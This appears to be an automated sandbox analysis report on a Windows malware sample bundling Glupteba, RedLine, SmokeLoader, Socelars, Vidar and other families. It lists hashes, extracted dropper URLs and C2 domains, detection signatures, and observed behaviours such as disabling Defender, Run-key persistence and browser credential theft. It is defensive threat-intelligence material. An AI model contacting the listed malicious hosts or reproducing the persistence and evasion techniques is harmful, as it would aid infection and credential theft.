glupteba | 9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e

Analysis

max time kernel
159s
max time network
167s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
12-03-2022 04:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe
Size

7.7MB
MD5

fce3d687fe1bd6ee17d9a75b8aa032fe
SHA1

1d970ca53afdcaeb25eb33cae59b657b65a46554
SHA256

9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e
SHA512

7206c9d45bf75457c490fff4a1c61cc0c4bf89c5cae84c5e9af474622a65e3cba1a3d40930952ff591bebcc13d9b3ab5a20c50e3a56dfd46ff581e6c1ed6bbce

Score

10^/10

glupteba metasploit redline smokeloader socelars tofsee vidar backdoor discovery dropper evasion infostealer loader persistence spyware stealer suricata trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4848-170-0x0000000001640000-0x0000000001F5E000-memory.dmp	family_glupteba
behavioral2/memory/4848-171-0x0000000000400000-0x0000000000D39000-memory.dmp	family_glupteba
behavioral2/memory/3704-173-0x0000000000400000-0x0000000000D39000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4428-216-0x00000000003C0000-0x0000000000705000-memory.dmp	family_redline
behavioral2/memory/4428-222-0x00000000003C0000-0x0000000000705000-memory.dmp	family_redline
behavioral2/memory/3104-218-0x0000000000690000-0x00000000008D5000-memory.dmp	family_redline
behavioral2/memory/3104-217-0x0000000000690000-0x00000000008D5000-memory.dmp	family_redline
behavioral2/memory/3104-233-0x0000000000690000-0x00000000008D5000-memory.dmp	family_redline
behavioral2/memory/4428-232-0x00000000003C0000-0x0000000000705000-memory.dmp	family_redline
behavioral2/memory/4428-229-0x00000000003C0000-0x0000000000705000-memory.dmp	family_redline
behavioral2/memory/3104-230-0x0000000000690000-0x00000000008D5000-memory.dmp	family_redline
behavioral2/memory/3260-279-0x0000000000AD0000-0x0000000000D65000-memory.dmp	family_redline
behavioral2/memory/3260-282-0x0000000000AD0000-0x0000000000D65000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 4076 created 3704 4076 svchost.exe Graphics.exe
PID 4076 created 3832 4076 svchost.exe csrss.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

description	pid	process	target process
PID 4076 created 3704	4076	svchost.exe	Graphics.exe
PID 4076 created 3832	4076	svchost.exe	csrss.exe

Executes dropped EXE 42 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFile.exejfiag3g_gg.exejfiag3g_gg.exeGraphics.execsrss.exeinjector.exe4BvMQEpgPl3TslO0ClNsiV6z.exerNd8peyL7zbmaO51tNRNMwxe.exeUhnvAZcIygWZ3LrV8uPMs7Jc.exefKa_Nzj7pB329RyFKr54Iqgc.exetZ_0knsT_hz1C495w9qaevhV.exekDhxf2bxikXcYAzduDonfU3S.exezXWgmHlK1sP9XbVWuGjIwYp9.exeL3zEfAnK4N3txtxmSWWSjrsJ.exeMoWVAJgqRrxeMGVZscqOEjOz.exeehc6FDCfzr_KirOWDyp49Id8.exeJqFnhoTm2vjZGYaNNjp0nVmm.exeGA8sQMFF4k8SJwYdDMrpsdvt.exerhvduHLKOQ9qOqWdv1W8YeRU.exexpp1lLCqx97thfsxvokyBy6Q.exeSX2wwq5OZKtiQHH5bJeLpAHt.exe1fBWJFpw0sDiUM61e33j_A4a.exem7aIxPh1BLVfzyXxvQo19Bck.exeFzBakAwWGn7br_VtGPiU94YM.exe1QHmNz9YPqkCI_7wBsa8Qvlx.exeinEo7AEwEWCJR_W1HiZjR7D0.exeCK3qWp4XpBUCZcEit4qvaFp5.exeInstall.exeInstall.exeYTpjZzIU44RuWqPOzhDS5nfj.exe1HJ0C.exeCMEE5.exepWcjcvAGHdDFvECmr78gwGIc.exeLG2H4.exe

pid	process
2440	SoCleanInst.exe
3736	md9_1sjm.exe
3860	Folder.exe
3704	Graphics.exe
3512	Updbdate.exe
3172	Install.exe
4000	Files.exe
5020	pub2.exe
2040	File.exe
4624	jfiag3g_gg.exe
4328	jfiag3g_gg.exe
4848	Graphics.exe
3832	csrss.exe
2148	injector.exe
1292	4BvMQEpgPl3TslO0ClNsiV6z.exe
644	rNd8peyL7zbmaO51tNRNMwxe.exe
3844	UhnvAZcIygWZ3LrV8uPMs7Jc.exe
3104	fKa_Nzj7pB329RyFKr54Iqgc.exe
1200	tZ_0knsT_hz1C495w9qaevhV.exe
4472	kDhxf2bxikXcYAzduDonfU3S.exe
5032	zXWgmHlK1sP9XbVWuGjIwYp9.exe
4992	L3zEfAnK4N3txtxmSWWSjrsJ.exe
4348	MoWVAJgqRrxeMGVZscqOEjOz.exe
4504	ehc6FDCfzr_KirOWDyp49Id8.exe
4428	JqFnhoTm2vjZGYaNNjp0nVmm.exe
3576	GA8sQMFF4k8SJwYdDMrpsdvt.exe
4204	rhvduHLKOQ9qOqWdv1W8YeRU.exe
2004	xpp1lLCqx97thfsxvokyBy6Q.exe
2016	SX2wwq5OZKtiQHH5bJeLpAHt.exe
4960	1fBWJFpw0sDiUM61e33j_A4a.exe
484	m7aIxPh1BLVfzyXxvQo19Bck.exe
1888	FzBakAwWGn7br_VtGPiU94YM.exe
4664	1QHmNz9YPqkCI_7wBsa8Qvlx.exe
1860	inEo7AEwEWCJR_W1HiZjR7D0.exe
1944	CK3qWp4XpBUCZcEit4qvaFp5.exe
1776	Install.exe
4984	Install.exe
2008	YTpjZzIU44RuWqPOzhDS5nfj.exe
3260	1HJ0C.exe
1412	CMEE5.exe
4052	pWcjcvAGHdDFvECmr78gwGIc.exe
4660	LG2H4.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\MoWVAJgqRrxeMGVZscqOEjOz.exe	upx
C:\Users\Admin\Pictures\Adobe Films\GA8sQMFF4k8SJwYdDMrpsdvt.exe	upx
C:\Users\Admin\Pictures\Adobe Films\GA8sQMFF4k8SJwYdDMrpsdvt.exe	upx
C:\Users\Admin\Pictures\Adobe Films\MoWVAJgqRrxeMGVZscqOEjOz.exe	upx

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

GA8sQMFF4k8SJwYdDMrpsdvt.exeUhnvAZcIygWZ3LrV8uPMs7Jc.exeL3zEfAnK4N3txtxmSWWSjrsJ.exe9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exeFile.exeehc6FDCfzr_KirOWDyp49Id8.exem7aIxPh1BLVfzyXxvQo19Bck.exeYTpjZzIU44RuWqPOzhDS5nfj.exeFzBakAwWGn7br_VtGPiU94YM.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	GA8sQMFF4k8SJwYdDMrpsdvt.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	UhnvAZcIygWZ3LrV8uPMs7Jc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	L3zEfAnK4N3txtxmSWWSjrsJ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	9f04034179c562e50d1ccaa04cca4af661996305f420642449604d938241a93e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	ehc6FDCfzr_KirOWDyp49Id8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	m7aIxPh1BLVfzyXxvQo19Bck.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	YTpjZzIU44RuWqPOzhDS5nfj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	FzBakAwWGn7br_VtGPiU94YM.exe

Loads dropped DLL 10 IoCs

Processes:

kDhxf2bxikXcYAzduDonfU3S.exezXWgmHlK1sP9XbVWuGjIwYp9.exe

pid	process
4472	kDhxf2bxikXcYAzduDonfU3S.exe
4472	kDhxf2bxikXcYAzduDonfU3S.exe
4472	kDhxf2bxikXcYAzduDonfU3S.exe
4472	kDhxf2bxikXcYAzduDonfU3S.exe
4472	kDhxf2bxikXcYAzduDonfU3S.exe
4472	kDhxf2bxikXcYAzduDonfU3S.exe
4472	kDhxf2bxikXcYAzduDonfU3S.exe
5032	zXWgmHlK1sP9XbVWuGjIwYp9.exe
5032	zXWgmHlK1sP9XbVWuGjIwYp9.exe
4472	kDhxf2bxikXcYAzduDonfU3S.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeGraphics.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LongGrass = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

275 ipinfo.io
276 ipinfo.io
44 ip-api.com
129 ipinfo.io
130 ipinfo.io
243 ipinfo.io
248 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

fKa_Nzj7pB329RyFKr54Iqgc.exeJqFnhoTm2vjZGYaNNjp0nVmm.exeinEo7AEwEWCJR_W1HiZjR7D0.exe1HJ0C.exeCMEE5.exe

pid process

3104 fKa_Nzj7pB329RyFKr54Iqgc.exe
4428 JqFnhoTm2vjZGYaNNjp0nVmm.exe
1860 inEo7AEwEWCJR_W1HiZjR7D0.exe
3260 1HJ0C.exe
1412 CMEE5.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
275	ipinfo.io
276	ipinfo.io
44	ip-api.com
129	ipinfo.io
130	ipinfo.io
243	ipinfo.io
248	ipinfo.io

pid	process
3104	fKa_Nzj7pB329RyFKr54Iqgc.exe
4428	JqFnhoTm2vjZGYaNNjp0nVmm.exe
1860	inEo7AEwEWCJR_W1HiZjR7D0.exe
3260	1HJ0C.exe
1412	CMEE5.exe

Drops file in Program Files directory 2 IoCs

Processes:

UhnvAZcIygWZ3LrV8uPMs7Jc.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	UhnvAZcIygWZ3LrV8uPMs7Jc.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	UhnvAZcIygWZ3LrV8uPMs7Jc.exe

Drops file in Windows directory 2 IoCs

Processes:

Graphics.exe

description ioc process

File opened for modification C:\Windows\rss Graphics.exe
File created C:\Windows\rss\csrss.exe Graphics.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4880	3704	WerFault.exe	Graphics.exe
2672	2004	WerFault.exe
1420	4204	WerFault.exe	rhvduHLKOQ9qOqWdv1W8YeRU.exe
3488	4960	WerFault.exe	1fBWJFpw0sDiUM61e33j_A4a.exe
4768	1200	WerFault.exe	tZ_0knsT_hz1C495w9qaevhV.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

3060 schtasks.exe
5064 schtasks.exe
2800 schtasks.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

4968 tasklist.exe

pid	process
3060	schtasks.exe
5064	schtasks.exe
2800	schtasks.exe

pid	process
4968	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5060 taskkill.exe

pid	process
5060	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	Graphics.exe
